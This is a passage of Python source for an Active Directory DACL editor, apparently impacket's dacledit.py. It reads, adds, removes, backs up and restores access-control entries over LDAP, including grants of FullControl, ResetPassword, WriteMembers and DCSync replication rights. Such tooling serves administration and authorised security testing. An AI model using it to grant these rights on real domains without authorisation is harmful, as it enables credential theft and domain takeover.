Trust Builders',\n 'S-1-5-32-556': 'BUILTIN\\\\Network Configuration Operators',\n 'S-1-5-32-558': 'BUILTIN\\\\Performance Monitor Users',\n 'S-1-5-32-559': 'BUILTIN\\\\Performance Log Users',\n 'S-1-5-32-560': 'BUILTIN\\\\Windows Authorization Access Group',\n 'S-1-5-32-561': 'BUILTIN\\\\Terminal Server License Servers',\n 'S-1-5-32-562': 'BUILTIN\\\\Distributed COM Users',\n 'S-1-5-32-569': 'BUILTIN\\\\Cryptographic Operators',\n 'S-1-5-32-573': 'BUILTIN\\\\Event Log Readers',\n 'S-1-5-32-574': 'BUILTIN\\\\Certificate Service DCOM Access',\n 'S-1-5-32-575': 'BUILTIN\\\\RDS Remote Access Servers',\n 'S-1-5-32-576': 'BUILTIN\\\\RDS Endpoint Servers',\n 'S-1-5-32-577': 'BUILTIN\\\\RDS Management Servers',\n 'S-1-5-32-578': 'BUILTIN\\\\Hyper-V Administrators',\n 'S-1-5-32-579': 'BUILTIN\\\\Access Control Assistance Operators',\n 'S-1-5-32-580': 'BUILTIN\\\\Remote Management Users',\n}\n\n\n# GUID rights enum\n# GUID thats permits to identify extended rights in an ACE\n# https://docs.microsoft.com/en-us/windows/win32/adschema/a-rightsguid\nclass RIGHTS_GUID(Enum):\n WriteMembers = \"bf9679c0-0de6-11d0-a285-00aa003049e2\"\n ResetPassword = \"00299570-246d-11d0-a768-00aa006e0529\"\n DS_Replication_Get_Changes = \"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2\"\n DS_Replication_Get_Changes_All = \"1131f6ad-9c07-11d1-f79f-00c04fc2dcd2\"\n\n\n# ACE flags enum\n# New ACE at the end of SACL for inheritance and access return system-audit\n# https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-addauditaccessobjectace\nclass ACE_FLAGS(Enum):\n CONTAINER_INHERIT_ACE = ldaptypes.ACE.CONTAINER_INHERIT_ACE\n FAILED_ACCESS_ACE_FLAG = ldaptypes.ACE.FAILED_ACCESS_ACE_FLAG\n INHERIT_ONLY_ACE = ldaptypes.ACE.INHERIT_ONLY_ACE\n INHERITED_ACE = ldaptypes.ACE.INHERITED_ACE\n NO_PROPAGATE_INHERIT_ACE = ldaptypes.ACE.NO_PROPAGATE_INHERIT_ACE\n OBJECT_INHERIT_ACE = ldaptypes.ACE.OBJECT_INHERIT_ACE\n SUCCESSFUL_ACCESS_ACE_FLAG = ldaptypes.ACE.SUCCESSFUL_ACCESS_ACE_FLAG\n\n\n# ACE flags enum\n# For an ACE, flags that indicate if the ObjectType and the InheritedObjecType are set with a GUID\n# Since these two flags are the same for Allowed and Denied access, the same class will be used from 'ldaptypes'\n# https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-access_allowed_object_ace\nclass OBJECT_ACE_FLAGS(Enum):\n ACE_OBJECT_TYPE_PRESENT = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT\n ACE_INHERITED_OBJECT_TYPE_PRESENT = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_INHERITED_OBJECT_TYPE_PRESENT\n\n\n# Access Mask enum\n# Access mask permits to encode principal's rights to an object. This is the rights the principal behind the specified SID has\n# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/7a53f60e-e730-4dfe-bbe9-b21b62eb790b\n# https://docs.microsoft.com/en-us/windows/win32/api/iads/ne-iads-ads_rights_enum?redirectedfrom=MSDN\nclass ACCESS_MASK(Enum):\n # Generic Rights\n GenericRead = 0x80000000 # ADS_RIGHT_GENERIC_READ\n GenericWrite = 0x40000000 # ADS_RIGHT_GENERIC_WRITE\n GenericExecute = 0x20000000 # ADS_RIGHT_GENERIC_EXECUTE\n GenericAll = 0x10000000 # ADS_RIGHT_GENERIC_ALL\n\n # Maximum Allowed access type\n MaximumAllowed = 0x02000000\n\n # Access System Acl access type\n AccessSystemSecurity = 0x01000000 # ADS_RIGHT_ACCESS_SYSTEM_SECURITY\n\n # Standard access types\n Synchronize = 0x00100000 # ADS_RIGHT_SYNCHRONIZE\n WriteOwner = 0x00080000 # ADS_RIGHT_WRITE_OWNER\n WriteDACL = 0x00040000 # ADS_RIGHT_WRITE_DAC\n ReadControl = 0x00020000 # ADS_RIGHT_READ_CONTROL\n Delete = 0x00010000 # ADS_RIGHT_DELETE\n\n # Specific rights\n AllExtendedRights = 0x00000100 # ADS_RIGHT_DS_CONTROL_ACCESS\n ListObject = 0x00000080 # ADS_RIGHT_DS_LIST_OBJECT\n DeleteTree = 0x00000040 # ADS_RIGHT_DS_DELETE_TREE\n WriteProperties = 0x00000020 # ADS_RIGHT_DS_WRITE_PROP\n ReadProperties = 0x00000010 # ADS_RIGHT_DS_READ_PROP\n Self = 0x00000008 # ADS_RIGHT_DS_SELF\n ListChildObjects = 0x00000004 # ADS_RIGHT_ACTRL_DS_LIST\n DeleteChild = 0x00000002 # ADS_RIGHT_DS_DELETE_CHILD\n CreateChild = 0x00000001 # ADS_RIGHT_DS_CREATE_CHILD\n\n\n# Simple permissions enum\n# Simple permissions are combinaisons of extended permissions\n# https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc783530(v=ws.10)?redirectedfrom=MSDN\nclass SIMPLE_PERMISSIONS(Enum):\n FullControl = 0xf01ff\n Modify = 0x0301bf\n ReadAndExecute = 0x0200a9\n ReadAndWrite = 0x02019f\n Read = 0x20094\n Write = 0x200bc\n\n\n# Mask ObjectType field enum\n# Possible values for the Mask field in object-specific ACE (permitting to specify extended rights in the ObjectType field for example)\n# Since these flags are the same for Allowed and Denied access, the same class will be used from 'ldaptypes'\n# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/c79a383c-2b3f-4655-abe7-dcbb7ce0cfbe\nclass ALLOWED_OBJECT_ACE_MASK_FLAGS(Enum):\n ControlAccess = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS\n CreateChild = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CREATE_CHILD\n DeleteChild = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_DELETE_CHILD\n ReadProperty = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_READ_PROP\n WriteProperty = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP\n Self = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_SELF\n\n\nclass DACLedit(object):\n \"\"\"docstring for setrbcd\"\"\"\n\n def __init__(self, ldap_server, ldap_session, args):\n super(DACLedit, self).__init__()\n self.ldap_server = ldap_server\n self.ldap_session = ldap_session\n\n self.target_sAMAccountName = args.target_sAMAccountName\n self.target_SID = args.target_SID\n self.target_DN = args.target_DN\n\n self.principal_sAMAccountName = args.principal_sAMAccountName\n self.principal_SID = args.principal_SID\n self.principal_DN = args.principal_DN\n\n self.ace_type = args.ace_type\n self.rights = args.rights\n self.rights_guid = args.rights_guid\n self.filename = args.filename\n self.inheritance = args.inheritance\n if self.inheritance:\n logging.info(\"NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU\")\n\n logging.debug('Initializing domainDumper()')\n cnf = ldapdomaindump.domainDumpConfig()\n cnf.basepath = None\n self.domain_dumper = ldapdomaindump.domainDumper(self.ldap_server, self.ldap_session, cnf)\n\n if args.mask is not None:\n if args.mask.startswith(\"0x\"):\n self.force_mask = int(args.mask, 16)\n elif args.mask == \"readwrite\":\n self.force_mask = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_READ_PROP + \\\n ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP\n elif args.mask == \"write\":\n self.force_mask = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP\n elif args.mask == \"self\":\n self.force_mask = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_SELF\n elif args.mask == \"allext\":\n self.force_mask = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS\n else:\n self.force_mask = None\n\n if self.target_sAMAccountName or self.target_SID or self.target_DN:\n # Searching for target account with its security descriptor\n self.search_target_principal_security_descriptor()\n # Extract security descriptor data\n self.principal_raw_security_descriptor = self.target_principal['nTSecurityDescriptor'].raw_values[0]\n self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor)\n\n # Searching for the principal SID if any principal argument was given and principal_SID wasn't\n if self.principal_SID is None and self.principal_sAMAccountName is not None or self.principal_DN is not None:\n _lookedup_principal = \"\"\n if self.principal_sAMAccountName is not None:\n _lookedup_principal = self.principal_sAMAccountName\n self.ldap_session.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(_lookedup_principal), attributes=['objectSid'])\n elif self.principal_DN is not None:\n _lookedup_principal = self.principal_DN\n self.ldap_session.search(_lookedup_principal, '(distinguishedName=%s)' % _lookedup_principal, attributes=['objectSid'])\n try:\n self.principal_SID = format_sid(self.ldap_session.entries[0]['objectSid'].raw_values[0])\n logging.debug(\"Found principal SID: %s\" % self.principal_SID)\n except IndexError:\n logging.error('Principal SID not found in LDAP (%s)' % _lookedup_principal)\n exit(1)\n\n\n # Main read funtion\n # Prints the parsed DACL\n def read(self):\n parsed_dacl = self.parseDACL(self.principal_security_descriptor['Dacl'])\n self.printparsedDACL(parsed_dacl)\n return\n\n\n # Main write function\n # Attempts to add a new ACE to a DACL\n def write(self):\n # Creates ACEs with the specified GUIDs and the SID, or FullControl if no GUID is specified\n # Append the ACEs in the DACL locally\n if self.rights == \"FullControl\" and self.rights_guid is None:\n logging.debug(\"Appending ACE (%s --(FullControl)--> %s)\" % (self.principal_SID, format_sid(self.target_SID)))\n self.principal_security_descriptor['Dacl'].aces.append(self.create_ace(SIMPLE_PERMISSIONS.FullControl.value, self.principal_SID, self.ace_type))\n elif self.rights == \"Custom\" and self.force_mask is not None:\n logging.debug(\"Appending ACE (%s --(Custom)--> %s)\" % (self.principal_SID, format_sid(self.target_SID)))\n self.principal_security_descriptor['Dacl'].aces.append(self.create_ace(self.force_mask, self.principal_SID, self.ace_type))\n else:\n for rights_guid in self.build_guids_for_rights():\n logging.debug(\"Appending ACE (%s --(%s)--> %s)\" % (self.principal_SID, rights_guid, format_sid(self.target_SID)))\n self.principal_security_descriptor['Dacl'].aces.append(self.create_object_ace(rights_guid, self.principal_SID, self.ace_type, force_mask=self.force_mask))\n # Backups current DACL before add the new one\n self.backup()\n # Effectively push the DACL with the new ACE\n self.modify_secDesc_for_dn(self.target_principal.entry_dn, self.principal_security_descriptor)\n return\n\n\n # Attempts to remove an ACE from the DACL\n # To do it, a new DACL is built locally with all the ACEs that must NOT BE removed, and this new DACL is pushed on the server\n def remove(self):\n compare_aces = []\n # Creates ACEs with the specified GUIDs and the SID, or FullControl if no GUID is specified\n # These ACEs will be used as comparison templates\n if self.rights == \"FullControl\" and self.rights_guid is None:\n compare_aces.append(self.create_ace(SIMPLE_PERMISSIONS.FullControl.value, self.principal_SID, self.ace_type))\n elif self.rights == \"Custom\" and self.force_mask is not None:\n compare_aces.append(self.create_ace(self.force_mask, self.principal_SID, self.ace_type))\n else:\n for rights_guid in self.build_guids_for_rights():\n compare_aces.append(self.create_object_ace(rights_guid, self.principal_SID, self.ace_type, force_mask=self.force_mask))\n new_dacl = []\n i = 0\n dacl_must_be_replaced = False\n for ace in self.principal_security_descriptor['Dacl'].aces:\n ace_must_be_removed = False\n for compare_ace in compare_aces:\n # To be sure the good ACEs are removed, multiple fields are compared between the templates and the ACEs in the DACL\n # - ACE type\n # - ACE flags\n # - Access masks\n # - Revision\n # - SubAuthorityCount\n # - SubAuthority\n # - IdentifierAuthority value\n if ace['AceType'] == compare_ace['AceType'] \\\n and ace['AceFlags'] == compare_ace['AceFlags']\\\n and ace['Ace']['Mask']['Mask'] == compare_ace['Ace']['Mask']['Mask']\\\n and ace['Ace']['Sid']['Revision'] == compare_ace['Ace']['Sid']['Revision']\\\n and ace['Ace']['Sid']['SubAuthorityCount'] == compare_ace['Ace']['Sid']['SubAuthorityCount']\\\n and ace['Ace']['Sid']['SubAuthority'] == compare_ace['Ace']['Sid']['SubAuthority']\\\n and ace['Ace']['Sid']['IdentifierAuthority']['Value'] == compare_ace['Ace']['Sid']['IdentifierAuthority']['Value']:\n # If the ACE has an ObjectType, the GUIDs must match\n if 'ObjectType' in ace['Ace'].fields.keys() and 'ObjectType' in compare_ace['Ace'].fields.keys():\n if ace['Ace']['ObjectType'] == compare_ace['Ace']['ObjectType']:\n ace_must_be_removed = True\n dacl_must_be_replaced = True\n else:\n ace_must_be_removed = True\n dacl_must_be_replaced = True\n # If the ACE doesn't match any ACEs from the template list, it is added to the DACL that will be pushed\n if not ace_must_be_removed:\n new_dacl.append(ace)\n elif logging.getLogger().level == logging.DEBUG:\n logging.debug(\"This ACE will be removed\")\n self.printparsedACE(self.parseACE(ace))\n i += 1\n # If at least one ACE must been removed\n if dacl_must_be_replaced:\n self.principal_security_descriptor['Dacl'].aces = new_dacl\n self.backup()\n self.modify_secDesc_for_dn(self.target_principal.entry_dn, self.principal_security_descriptor)\n else:\n logging.info(\"Nothing to remove...\")\n\n \n # Permits to backup a DACL before a modification\n # This function is called before any writing action (write, remove or restore)\n def backup(self):\n backup = {}\n backup[\"sd\"] = binascii.hexlify(self.principal_raw_security_descriptor).decode('utf-8')\n backup[\"dn\"] = self.target_principal.entry_dn\n if not self.filename:\n self.filename = 'dacledit-%s.bak' % datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n else:\n if os.path.exists(self.filename):\n logging.info(\"File %s already exists, I'm refusing to overwrite it, setting another filename\" % self.filename)\n self.filename = 'dacledit-%s.bak' % datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n with codecs.open(self.filename, 'w', 'utf-8') as outfile:\n json.dump(backup, outfile)\n logging.info('DACL backed up to %s', self.filename)\n\n \n # Permits to restore a saved DACL\n def restore(self):\n # Opens and load the file where the DACL has been saved\n with codecs.open(self.filename, 'r', 'utf-8') as infile:\n restore = json.load(infile)\n assert \"sd\" in restore.keys()\n assert \"dn\" in restore.keys()\n # Extracts the Security Descriptor and converts it to the good ldaptypes format\n new_raw_security_descriptor = binascii.unhexlify(restore[\"sd\"].encode('utf-8'))\n new_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=new_raw_security_descriptor)\n\n self.target_DN = restore[\"dn\"]\n # Searching for target account with its security descriptor\n self.search_target_principal_security_descriptor()\n # Extract security descriptor data\n self.principal_raw_security_descriptor = self.target_principal['nTSecurityDescriptor'].raw_values[0]\n self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor)\n\n # Do a backup of the actual DACL and push the restoration\n self.backup()\n logging.info('Restoring DACL')\n self.modify_secDesc_for_dn(self.target_DN, new_security_descriptor)\n \n # Attempts to retrieve the DACL in the Security Descriptor of the specified target\n def search_target_principal_security_descriptor(self):\n _lookedup_principal = \"\"\n # Set SD flags to only query for DACL\n controls = security_descriptor_control(sdflags=0x04)\n if self.target_sAMAccountName is not None:\n _lookedup_principal = self.target_sAMAccountName\n self.ldap_session.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(_lookedup_principal), attributes=['nTSecurityDescriptor'], controls=controls)\n elif self.target_SID is not None:\n _lookedup_principal = self.target_SID\n self.ldap_session.search(self.domain_dumper.root, '(objectSid=%s)' % _lookedup_principal, attributes=['nTSecurityDescriptor'], controls=controls)\n elif self.target_DN is not None:\n _lookedup_principal = self.target_DN\n self.ldap_session.search(_lookedup_principal, '(distinguishedName=%s)' % _lookedup_principal, attributes=['nTSecurityDescriptor'], controls=controls)\n try:\n self.target_principal = self.ldap_session.entries[0]\n logging.debug('Target principal found in LDAP (%s)' % _lookedup_principal)\n except IndexError:\n logging.error('Target principal not found in LDAP (%s)' % _lookedup_principal)\n exit(0)\n\n \n # Attempts to retieve the SID and Distinguisehd Name from the sAMAccountName\n # Not used for the moment\n # - samname : a sAMAccountName\n def get_user_info(self, samname):\n self.ldap_session.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(samname), attributes=['objectSid'])\n try:\n dn = self.ldap_session.entries[0].entry_dn\n sid = format_sid(self.ldap_session.entries[0]['objectSid'].raw_values[0])\n return dn, sid\n except IndexError:\n logging.error('User not found in LDAP: %s' % samname)\n return False\n\n \n # Attempts to resolve a SID and return the corresponding samaccountname\n # - sid : the SID to resolve\n def resolveSID(self, sid):\n # Tries to resolve the SID from the well known SIDs\n if sid in WELL_KNOWN_SIDS.keys():\n return WELL_KNOWN_SIDS[sid]\n # Tries to resolve the SID from the LDAP domain dump\n else:\n self.ldap_session.search(self.domain_dumper.root, '(objectSid=%s)' % sid, attributes=['samaccountname'])\n try:\n dn = self.ldap_session.entries[0].entry_dn\n samname = self.ldap_session.entries[0]['samaccountname']\n return samname\n except IndexError:\n logging.debug('SID not found in LDAP: %s' % sid)\n return \"\"\n\n \n # Parses a full DACL\n # - dacl : the DACL to parse, submitted in a Security Desciptor format\n def parseDACL(self, dacl):\n parsed_dacl = []\n logging.info(\"Parsing DACL\")\n i = 0\n for ace in dacl['Data']:\n parsed_ace = self.parseACE(ace)\n parsed_dacl.append(parsed_ace)\n i += 1\n return parsed_dacl\n\n \n # Parses an access mask to extract the different values from a simple permission\n # https://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights\n # - fsr : the access mask to parse\n def parsePerms(self, fsr):\n _perms = []\n for PERM in SIMPLE_PERMISSIONS:\n if (fsr & PERM.value) == PERM.value:\n _perms.append(PERM.name)\n fsr = fsr & (~ PERM.value)\n for PERM in ACCESS_MASK:\n if fsr & PERM.value:\n _perms.append(PERM.name)\n return _perms\n\n \n # Parses a specified ACE and extract the different values (Flags, Access Mask, Trustee, ObjectType, InheritedObjectType)\n # - ace : the ACE to parse\n def parseACE(self, ace):\n # For the moment, only the Allowed and Denied Access ACE are supported\n if ace['TypeName'] in [ \"ACCESS_ALLOWED_ACE\", \"ACCESS_ALLOWED_OBJECT_ACE\", \"ACCESS_DENIED_ACE\", \"ACCESS_DENIED_OBJECT_ACE\" ]:\n parsed_ace = {}\n parsed_ace['ACE Type'] = ace['TypeName']\n # Retrieves ACE's flags\n _ace_flags = []\n for FLAG in ACE_FLAGS:\n if ace.hasFlag(FLAG.value):\n _ace_flags.append(FLAG.name)\n parsed_ace['ACE flags'] = \", \".join(_ace_flags) or \"None\"\n\n # For standard ACE\n # Extracts the access mask (by parsing the simple permissions) and the principal's SID\n if ace['TypeName'] in [ \"ACCESS_ALLOWED_ACE\", \"ACCESS_DENIED_ACE\" ]:\n parsed_ace['Access mask'] = \"%s (0x%x)\" % (\", \".join(self.parsePerms(ace['Ace']['Mask']['Mask'])), ace['Ace']['Mask']['Mask'])\n parsed_ace['Trustee (SID)'] = \"%s (%s)\" % (self.resolveSID(ace['Ace']['Sid'].formatCanonical()) or \"UNKNOWN\", ace['Ace']['Sid'].formatCanonical())\n\n # For object-specific ACE\n elif ace['TypeName'] in [ \"ACCESS_ALLOWED_OBJECT_ACE\", \"ACCESS_DENIED_OBJECT_ACE\" ]:\n # Extracts the mask values. These values will indicate the ObjectType purpose\n _access_mask_flags = []\n for FLAG in ALLOWED_OBJECT_ACE_MASK_FLAGS:\n if ace['Ace']['Mask'].hasPriv(FLAG.value):\n _access_mask_flags.append(FLAG.name)\n parsed_ace['Access mask'] = \"%s (0x%x)\" % (\", \".join(_access_mask_flags), ace['Ace']['Mask']['Mask'])\n # Extracts the ACE flag values and the trusted SID\n _object_flags = []\n for FLAG in OBJECT_ACE_FLAGS:\n if ace['Ace'].hasFlag(FLAG.value):\n _object_flags.append(FLAG.name)\n parsed_ace['Flags'] = \", \".join(_object_flags) or \"None\"\n # Extracts the ObjectType GUID values\n if ace['Ace']['ObjectTypeLen'] != 0:\n obj_type = bin_to_string(ace['Ace']['ObjectType']).lower()\n try:\n parsed_ace['Object type (GUID)'] = \"%s (%s)\" % (OBJECT_TYPES_GUID[obj_type], obj_type)\n except KeyError:\n parsed_ace['Object type (GUID)'] = \"UNKNOWN (%s)\" % obj_type\n # Extracts the InheritedObjectType GUID values\n if ace['Ace']['InheritedObjectTypeLen'] != 0:\n inh_obj_type = bin_to_string(ace['Ace']['InheritedObjectType']).lower()\n try:\n parsed_ace['Inherited type (GUID)'] = \"%s (%s)\" % (OBJECT_TYPES_GUID[inh_obj_type], inh_obj_type)\n except KeyError:\n parsed_ace['Inherited type (GUID)'] = \"UNKNOWN (%s)\" % inh_obj_type\n # Extract the Trustee SID (the object that has the right over the DACL bearer)\n parsed_ace['Trustee (SID)'] = \"%s (%s)\" % (self.resolveSID(ace['Ace']['Sid'].formatCanonical()) or \"UNKNOWN\", ace['Ace']['Sid'].formatCanonical())\n\n else:\n # If the ACE is not an access allowed\n logging.debug(\"ACE Type (%s) unsupported for parsing yet, feel free to contribute\" % ace['TypeName'])\n parsed_ace = {}\n parsed_ace['ACE type'] = ace['TypeName']\n _ace_flags = []\n for FLAG in ACE_FLAGS:\n if ace.hasFlag(FLAG.value):\n _ace_flags.append(FLAG.name)\n parsed_ace['ACE flags'] = \", \".join(_ace_flags) or \"None\"\n parsed_ace['DEBUG'] = \"ACE type not supported for parsing by dacleditor.py, feel free to contribute\"\n return parsed_ace\n\n\n # Prints a full DACL by printing each parsed ACE\n # - parsed_dacl : a parsed DACL from parseDACL()\n def printparsedDACL(self, parsed_dacl):\n # Attempts to retrieve the principal's SID if it's a write action\n if self.principal_SID is None and self.principal_sAMAccountName or self.principal_DN:\n if self.principal_sAMAccountName is not None:\n _lookedup_principal = self.principal_sAMAccountName\n self.ldap_session.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(_lookedup_principal), attributes=['objectSid'])\n elif self.principal_DN is not None:\n _lookedup_principal = self.principal_DN\n self.ldap_session.search(_lookedup_principal, '(distinguishedName=%s)' % _lookedup_principal, attributes=['objectSid'])\n try:\n self.principal_SID = format_sid(self.ldap_session.entries[0]['objectSid'].raw_values[0])\n except IndexError:\n logging.error('Principal not found in LDAP (%s)' % _lookedup_principal)\n return False\n logging.debug(\"Found principal SID to write in ACE(s): %s\" % self.principal_SID)\n\n logging.info(\"Printing parsed DACL\")\n i = 0\n # If a principal has been specified, only the ACE where he is the trustee will be printed\n if self.principal_SID is not None:\n logging.info(\"Filtering results for SID (%s)\" % self.principal_SID)\n for parsed_ace in parsed_dacl:\n print_ace = True\n if self.principal_SID is not None:\n try:\n if self.principal_SID not in parsed_ace['Trustee (SID)']:\n print_ace = False\n except Exception as e:\n logging.error(\"Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)\" % e)\n if print_ace:\n logging.info(\" %-28s\" % \"ACE[%d] info\" % i)\n self.printparsedACE(parsed_ace)\n i += 1\n\n\n # Prints properly a parsed ACE\n # - parsed_ace : a parsed ACE from parseACE()\n def printparsedACE(self, parsed_ace):\n elements_name = list(parsed_ace.keys())\n for attribute in elements_name:\n logging.info(\" %-26s: %s\" % (attribute, parsed_ace[attribute]))\n\n\n # Retrieves the GUIDs for the specified rights\n def build_guids_for_rights(self):\n _rights_guids = []\n if self.rights_guid is not None:\n _rights_guids = [self.rights_guid]\n elif self.rights == \"WriteMembers\":\n _rights_guids = [RIGHTS_GUID.WriteMembers.value]\n elif self.rights == \"ResetPassword\":\n _rights_guids = [RIGHTS_GUID.ResetPassword.value]\n elif self.rights == \"DCSync\":\n _rights_guids = [RIGHTS_GUID.DS_Replication_Get_Changes.value, RIGHTS_GUID.DS_Replication_Get_Changes_All.value]\n logging.debug('Built GUID: %s', _rights_guids)\n return _rights_guids\n\n\n # Attempts to push the locally built DACL to the remote server into the security descriptor of the specified principal\n # The target principal is specified with its Distinguished Name\n # - dn : the principal's Distinguished Name to modify\n # - secDesc : the Security Descriptor with the new DACL to push\n def modify_secDesc_for_dn(self, dn, secDesc):\n data = secDesc.getData()\n controls = security_descriptor_control(sdflags=0x04)\n logging.debug('Attempts to modify the Security Descriptor.')\n self.ldap_session.modify(dn, {'nTSecurityDescriptor': (ldap3.MODIFY_REPLACE, [data])}, controls=controls)\n if self.ldap_session.result['result'] == 0:\n logging.info('DACL modified successfully!')\n else:\n if self.ldap_session.result['result'] == 50:\n logging.error('Could not modify object, the server reports insufficient rights: %s',\n self.ldap_session.result['message'])\n elif self.ldap_session.result['result'] == 19:\n logging.error('Could not modify object, the server reports a constrained violation: %s',\n self.ldap_session.result['message'])\n else:\n logging.error('The server returned an error: %s', self.ldap_session.result['message'])\n\n\n # Builds a standard ACE for a specified access mask (rights) and a specified SID (the principal who obtains the right)\n # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/72e7c7ea-bc02-4c74-a619-818a16bf6adb\n # - access_mask : the allowed access mask\n # - sid : the principal's SID\n # - ace_type : the ACE type (allowed or denied)\n def create_ace(self, access_mask, sid, ace_type):\n nace = ldaptypes.ACE()\n if ace_type == \"allowed\":\n nace['AceType'] = ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE\n acedata = ldaptypes.ACCESS_ALLOWED_ACE()\n else:\n nace['AceType'] = ldaptypes.ACCESS_DENIED_ACE.ACE_TYPE\n acedata = ldaptypes.ACCESS_DENIED_ACE()\n if self.inheritance:\n nace['AceFlags'] = ldaptypes.ACE.OBJECT_INHERIT_ACE + ldaptypes.ACE.CONTAINER_INHERIT_ACE\n else:\n nace['AceFlags'] = 0x00\n acedata['Mask'] = ldaptypes.ACCESS_MASK()\n acedata['Mask']['Mask'] = access_mask\n acedata['Sid'] = ldaptypes.LDAP_SID()\n acedata['Sid'].fromCanonical(sid)\n nace['Ace'] = acedata\n logging.debug('ACE created.')\n return nace\n\n\n # Builds an object-specific for a specified ObjectType (an extended right, a property, etc, to add) for a specified SID (the principal who obtains the right)\n # The Mask is \"ADS_RIGHT_DS_CONTROL_ACCESS\" (the ObjectType GUID will identify an extended access right)\n # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/c79a383c-2b3f-4655-abe7-dcbb7ce0cfbe\n # - privguid : the ObjectType (an Extended Right here)\n # - sid : the principal's SID\n # - ace_type : the ACE type (allowed or denied)\n def create_object_ace(self, privguid, sid, ace_type, force_mask=None):\n nace = ldaptypes.ACE()\n if ace_type == \"allowed\":\n nace['AceType'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE\n acedata = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE()\n else:\n nace['AceType'] = ldaptypes.ACCESS_DENIED_OBJECT_ACE.ACE_TYPE\n acedata = ldaptypes.ACCESS_DENIED_OBJECT_ACE() \n if self.inheritance:\n nace['AceFlags'] = ldaptypes.ACE.OBJECT_INHERIT_ACE + ldaptypes.ACE.CONTAINER_INHERIT_ACE\n else:\n nace['AceFlags'] = 0x00\n acedata['Mask'] = ldaptypes.ACCESS_MASK()\n # WriteMembers not an extended right, we need read and write mask on the attribute (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/c79a383c-2b3f-4655-abe7-dcbb7ce0cfbe)\n # force_mask in the case we give the -rights-guid option\n if force_mask is not None:\n acedata['Mask']['Mask'] = force_mask\n elif privguid == RIGHTS_GUID.WriteMembers.value:\n acedata['Mask']['Mask'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_READ_PROP + ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP\n # Other rights in this script are extended rights and need the DS_CONTROL_ACCESS mask\n else:\n acedata['Mask']['Mask'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS\n acedata['ObjectType'] = string_to_bin(privguid)\n acedata['InheritedObjectType'] = b''\n acedata['Sid'] = ldaptypes.LDAP_SID()\n acedata['Sid'].fromCanonical(sid)\n assert sid == acedata['Sid'].formatCanonical()\n # This ACE flag verifes if the ObjectType is valid\n acedata['Flags'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT\n nace['Ace'] = acedata\n logging.debug('Object-specific ACE created.')\n return nace\n\n\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(add_help=True, description='Python editor for a principal\\'s DACL.')\n parser.add_argument('identity', action='store', help='domain.local/username[:password]')\n parser.add_argument('-use-ldaps', action='store_true', help='Use LDAPS instead of LDAP')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n\n auth_con = parser.add_argument_group('authentication & connection')\n auth_con.add_argument('-hashes', action=\"store\", metavar=\"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n auth_con.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n auth_con.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')\n auth_con.add_argument('-aesKey', action=\"store\", metavar=\"hex key\", help='AES key to use for Kerberos Authentication (128 or 256 bits)')\n auth_con.add_argument('-dc-ip', action='store', metavar=\"ip address\", help='IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter')\n auth_con.add_argument('-dc-host', action='store', 